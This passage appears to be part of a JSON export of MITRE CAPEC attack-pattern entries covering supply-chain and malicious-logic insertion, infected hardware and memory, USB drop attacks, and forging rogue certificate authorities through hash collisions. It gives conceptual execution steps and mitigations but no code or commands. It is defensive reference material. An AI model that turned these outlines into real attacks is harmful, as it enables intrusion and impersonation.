Modification During Distribution",{"Date":"2015-11-09"}]}},"440":{"ID":"440","Name":"Hardware Integrity Attack","Abstraction":"Meta","Status":"Stable","Description":"An adversary exploits a weakness in the system maintenance process and causes a change to be made to a technology, product, component, or sub-component or a new one installed during its deployed use at the victim location for the purpose of carrying out an attack.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Prerequisites":{"Prerequisite":"Influence over the deployed system at a victim location."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Execute Unauthorized Commands"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1200","Entry_Name":"Hardware Additions"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Description, Taxonomy_Mappings"}],"Previous_Entry_Name":["Integrity Modification During Deployed Use",{"Date":"2015-11-09"}]}},"441":{"ID":"441","Name":"Malicious Logic Insertion","Abstraction":"Meta","Status":"Stable","Description":"An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Prerequisites":{"Prerequisite":"Access to the component currently deployed at a victim location."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"}],"Previous_Entry_Name":["Malicious Logic Inserted Into to Product",{"Date":"2015-11-09"}]}},"442":{"ID":"442","Name":"Infected Software","Abstraction":"Standard","Status":"Stable","Description":"An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"441","Exclude_Related":[{"Exclude_ID":"515"},{"Exclude_ID":"437"}]}},"Prerequisites":{"Prerequisite":"Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn\'t normally have."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Leverage anti-virus products to detect and quarantine software with known virus."},"References":{"Reference":{"External_Reference_ID":"REF-387"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, Examples-Instances, References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Malicious Logic Inserted Into Product Software",{"Date":"2015-11-09"},"Malicious Logic Inserted Into To Product Software",{"Date":"2018-07-31"}]}},"443":{"ID":"443","Name":"Malicious Logic Inserted Into Product Software by Authorized Developer","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses their privileged position within an authorized software development organization to inject malicious logic into a codebase or product. Supply chain attacks from approved or trusted developers are extremely difficult to detect as it is generally assumed the quality control and internal security measures of these organizations conform to best practices. In some cases the malicious logic is intentional, embedded by a disgruntled employee, programmer, or individual with an otherwise hidden agenda. In other cases, the integrity of the product is compromised by accident (e.g. by lapse in the internal security of the organization that results in a product becoming contaminated). In other cases, the developer embeds a backdoor into a product to serve some purpose, such as product support, but discovery of the backdoor results in its malicious use by adversaries.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"Access to the software during the development phase."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality."},"References":{"Reference":{"External_Reference_ID":"REF-379"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"444":{"ID":"444","Name":"Development Alteration","Abstraction":"Standard","Status":"Stable","Description":"An adversary modifies a technology, product, or component during its development to acheive a negative impact once the system is deployed. The goal of the adversary is to modify the system in such a way that the negative impact can be leveraged when the system is later deployed. Development alteration attacks may include attacks that insert malicious logic into the system\'s software, modify or replace hardware components, and other attacks which negatively impact the system during development. These attacks generally require insider access to modify source code or to tamper with hardware components. The product is then delivered to the user where the negative impact can be leveraged at a later time.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"438"}},"Prerequisites":{"Prerequisite":"Access to the system during the development phase to alter and/or modify software and hardware components. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn\'t normally have."},"Consequences":{"Consequence":[{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Integrity","Impact":"Alter Execution Logic"}]},"Mitigations":{"Mitigation":"Assess software and software components during development and prior to deployment to ensure that they function as intended and without any malicious functionality."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"}],"Previous_Entry_Name":["Malicious Logic Insertion into Product Software via Externally Manipulated Component",{"Date":"2015-11-09"}]}},"445":{"ID":"445","Name":"Malicious Logic Insertion into Product Software via Configuration Management Manipulation","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits a configuration management system so that malicious logic is inserted into a software products build, update or deployed environment. If an adversary can control the elements included in a product\'s configuration management for build they can potentially replace, modify or insert code files containing malicious logic. If an adversary can control elements of a product\'s ongoing operational configuration management baseline they can potentially force clients receiving updates from the system to install insecure software when receiving updates from the server. Configuration management servers operate on the basis of a client pool, instructing each client on which software to install. In some cases the configuration management server will automate the software installation process. A malicious insider or an adversary who has compromised the server can alter the software baseline that clients must install, allowing the adversary to compromise a large number of satellite machines using the configuration management system. If an adversary can control elements of a product\'s configuration management for its deployed environment they can potentially alter fundamental security properties of the system based on assumptions that secure configurations are in place.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"Access to the configuration management system during deployment or currently deployed at a victim location. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn\'t normally have."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":["Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality.","Leverage anti-virus products to detect and quarantine software with known virus."]},"References":{"Reference":{"External_Reference_ID":"REF-379"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"446":{"ID":"446","Name":"Malicious Logic Insertion into Product Software via Inclusion of 3rd Party Component Dependency","Abstraction":"Detailed","Status":"Stable","Description":"An adversary conducts supply chain attacks by the inclusion of insecure 3rd party components into a technology, product, or code-base, possibly packaging a malicious driver or component along with the product before shipping it to the consumer or acquirer. The result is a window of opportunity for exploiting the product or software until the insecure component is discovered. This supply chain threat can result in the installation of software that introduces widespread security vulnerabilities within an organization. One example could be the inclusion of an exploitable DLL (Dynamic Link Library) included within an antivirus technology. Because software often depends upon a large number of interdependent libraries and components to be present, security holes can be introduced merely by installing COTS software that comes pre-packaged with the components required for it to operate.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"Access to the software during the development phase. This access is often obtained via insider access to include the 3rd party component after deployment."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality."},"References":{"Reference":{"External_Reference_ID":"REF-379"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"447":{"ID":"447","Name":"Design Alteration","Abstraction":"Standard","Status":"Stable","Description":"An adversary modifies the design of a technology, product, or component to acheive a negative impact once the system is deployed. In this type of attack, the goal of the adversary is to modify the design of the system, prior to development starting, in such a way that the negative impact can be leveraged when the system is later deployed. Design alteration attacks differ from development alteration attacks in that design alteration attacks take place prior to development and which then may or may not be developed by the adverary. Design alteration attacks include modifying system designs to degrade system performance, cause unexpected states or errors, and general design changes that may lead to additional vulnerabilities. These attacks generally require insider access to modify design documents, but they may also be spoofed via web communications. The product is then developed and delivered to the user where the negative impact can be leveraged at a later time.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"438","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":["Access to system design documentation prior to the development phase. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn\'t normally have.","Ability to forge web communications to deliver modified design documentation."]},"Consequences":{"Consequence":[{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Integrity","Impact":"Alter Execution Logic"}]},"Mitigations":{"Mitigation":["Assess design documentation prior to development to ensure that they function as intended and without any malicious functionality.","Ensure that design documentation is saved in a secure location and has proper access controls set in place to avoid unnecessary modification."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Malicious Logic Insertion into Product Software during Update",{"Date":"2015-11-09"}]}},"448":{"ID":"448","Name":"Embed Virus into DLL","Abstraction":"Detailed","Status":"Stable","Description":"An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"442","Exclude_Related":[{"Exclude_ID":"515"},{"Exclude_ID":"437"}]}},"Prerequisites":{"Prerequisite":"Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn\'t normally have."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Leverage anti-virus products to detect and quarantine software with known virus."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Malware Infection into Product Software",{"Date":"2018-07-31"}]}},"452":{"ID":"452","Name":"Infected Hardware","Abstraction":"Standard","Status":"Stable","Description":"An adversary inserts malicious logic into hardware, typically in the form of a computer virus or rootkit. This logic is often hidden from the user of the hardware and works behind the scenes to achieve negative impacts. This pattern of attack focuses on hardware already fielded and used in operation as opposed to hardware that is still under development and part of the supply chain.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"441","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"Access to the hardware currently deployed at a victim location."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Malicious Logic Insertion into Product Hardware",{"Date":"2018-07-31"}]}},"456":{"ID":"456","Name":"Infected Memory","Abstraction":"Standard","Status":"Stable","Description":"An adversary inserts malicious logic into memory enabling them to achieve a negative impact. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems that are still under development and part of the supply chain.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"441","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"437"}]}},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Leverage anti-virus products to detect stop operations with known virus."},"Example_Instances":{"Example":["A USB Memory stick has malicious logic inserted before shipping of the product allowing for infection of the host machine once inserted into the USB port.","In 2007, approximately 1800 of Seagate\'s Maxtor Personal Storage 3200 drives were built under contract with an outside manufacturer and contained a virus that stole user passwords."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary, Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Malicious Logic Insertion into Product Memory",{"Date":"2018-07-31"}]}},"457":{"ID":"457","Name":"USB Memory Attacks","Abstraction":"Detailed","Status":"Draft","Description":"An adversary loads malicious code onto a USB memory stick in order to infect any system which the device is plugged in to. USB drives present a significant security risk for business and government agencies. Given the ability to integrate wireless functionality into a USB stick, it is possible to design malware that not only steals confidential data, but sniffs the network, or monitor keystrokes, and then exfiltrates the stolen data off-site via a Wireless connection. Also, viruses can be transmitted via the USB interface without the specific use of a memory stick. The attacks from USB devices are often of such sophistication that experts conclude they are not the work of single individuals, but suggest state sponsorship. These attacks can be performed by an adversary with direct access to a target system or can be executed via means such as USB Drop Attacks.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"456"},{"Nature":"CanPrecede","CAPEC_ID":"529"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine Target System] In certain cases, the adversary will explore an organization\'s network to determine a specific target machine to exploit based on the information it contains or privileges the main user may possess.","Technique":"If needed, the adversary explores an organization\'s network to determine if any specific systems of interest exist."},{"Step":"2","Phase":"Experiment","Description":"[Develop or Obtain malware and install on a USB device] The adversary develops or obtains the malicious software necessary to exploit the target system, which they then install on an external USB device such as a USB flash drive.","Technique":"The adversary can develop or obtain malware for to perform a variety of tasks such as sniffing network traffic or monitoring keystrokes."},{"Step":"3","Phase":"Exploit","Description":"[Connect or deceive a user into connecting the infected USB device] Once the malware has been placed on an external USB device, the adversary connects the device to the target system or deceives a user into connecting the device to the target system such as in a USB Drop Attack.","Technique":"The adversary connects the USB device to a specified target system or performs a USB Drop Attack, hoping a user will find and connect the USB device on their own. Once the device is connected, the malware executes giving the adversary access to network traffic, credentials, etc."}]},"Prerequisites":{"Prerequisite":["Some level of physical access to the device being attacked.","Information pertaining to the target organization on how to best execute a USB Drop Attack."]},"Mitigations":{"Mitigation":["Ensure that proper, physical system access is regulated to prevent an adversary from physically connecting a malicious USB device themself.","Use anti-virus and anti-malware tools which can prevent malware from executing if it finds its way onto a target system. Additionally, make sure these tools are regularly updated to contain up-to-date virus and malware signatures.","Do not connect untrusted USB devices to systems connected on an organizational network. Additionally, use an isolated testing machine to validate untrusted devices and confirm malware does not exist."]},"References":{"Reference":{"External_Reference_ID":"REF-379"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description, Description Summary, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Mitigations"}]}},"458":{"ID":"458","Name":"Flash Memory Attacks","Abstraction":"Detailed","Status":"Draft","Description":"An attacker inserts malicious logic into a product or technology via flashing the on-board memory with a code-base that contains malicious logic. Various attacks exist against the integrity of flash memory, the most direct being rootkits coded into the BIOS or chipset of a device. Such attacks are very difficult to detect because the malicious code resides outside the filesystem or RAM, and in the underlying byte-code that drives the processor. Many devices, such as the recent attacks against digital picture frames, contain only a microprocessor and a small amount of solid-state memory, rendering these devices ideal for \\"flash\\" based malware or malicious logic. One of the pernicious characteristics of flash memory based attacks is that the malicious code can survive even a total format of the hard-drive and reinstallation of the host operating system. Virtually any device which can be integrated into a computer system is susceptible to these attacks. Additionally, any peripheral device which interfaces with the computer bus could extract or sniff confidential data, even on systems employing full-disk encryption. Trojan code placed into a video card\'s chipset would continue to perform its function irrespective of the host operating system, and would be invisible to all known antivirus. The threats extend to consumer products such as camcorders, digital cameras, or any consumer electronic device with an embedded microcontroller.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"456"}},"References":{"Reference":[{"External_Reference_ID":"REF-379"},{"External_Reference_ID":"REF-394"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"459":{"ID":"459","Name":"Creating a Rogue Certification Authority Certificate","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their \\"to be signed\\" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary\'s second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. Alternatively, the second certificate could be a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attacker\'s first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will the Certificate Authority set up by the adversary and any certificates that it signs. As a result, the adversary is able to generate any SSL certificates to impersonate any web server, and the user\'s browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Exploit","Description":"The adversary crafts two different, but valid X.509 certificates that when hashed with an insufficiently collision resistant hashing algorithm would yield the same value."},{"Step":"2","Phase":"Exploit","Description":"The adversary sends the CSR for one of the certificates to the Certification Authority which uses the targeted hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key."},{"Step":"3","Phase":"Exploit","Description":"The adversary takes the signed blob and inserts it into the second X.509 certificate that the attacker generated. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob is valid in the second certificate. The result is two certificates that appear to be signed by a valid certificate authority despite only one having been signed."}]},"Prerequisites":{"Prerequisite":"Certification Authority is using a hash function with insufficient collision resistance to generate the certificate hash to be signed"},"Skills_Required":{"Skill":["Understanding of how to force a hash collision in X.509 certificates",{"Level":"High"},"An attacker must be able to craft two X.509 certificates that produce the same hash value",{"Level":"High"},"Knowledge needed to set up a certification authority",{"Level":"Medium"}]},"Resources_Required":{"Resource":["Knowledge of a certificate authority that uses hashing algorithms with poor collision resistance","A valid certificate request and a malicious certificate request with identical hash values"]},"Consequences":{"Consequence":{"Scope":["Access Control","Authentication"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":"Certification Authorities need to stop using deprecated or cryptographically insecure hashing algorithms to hash the certificates that they are about to sign. Instead they should be using stronger hashing functions such as SHA-256 or SHA-512."},"Example_Instances":{"Example":[{"div":["MD5 Collisions",{"style":"color:#32498D; font-weight:bold;"}],"p":"The MD5 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities."},{"div":["SHA1 Collisions",{"style":"color:#32498D; font-weight:bold;"}],"p":"The SHA1 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities."},{"div":["PKI Infrastructure vulnerabilities",{"style":"color:#32498D; font-weight:bold;"}],"p":"Research has show significant vulnerabilities in PKI infrastructure. Trusted certificate authorities have been shown to use weak hashing algorithms after attacks have been demonstrated against those algorithms. Additionally, reliable methods have been demonstrated for generated MD5 collisions that could be used to generate malicious CSRs."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"327"},{"CWE_ID":"295"},{"CWE_ID":"290"}]},"References":{"Reference":[{"External_Reference_ID":"REF-395"},{"External_Reference_ID":"REF-587"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Example_Instances, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Resources_Required, Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Creating a Rogue Certificate Authority Certificate",{"Date":"2017-05-01"}]}},"460":{"ID":"460","Name":"HTTP Parameter Pollution 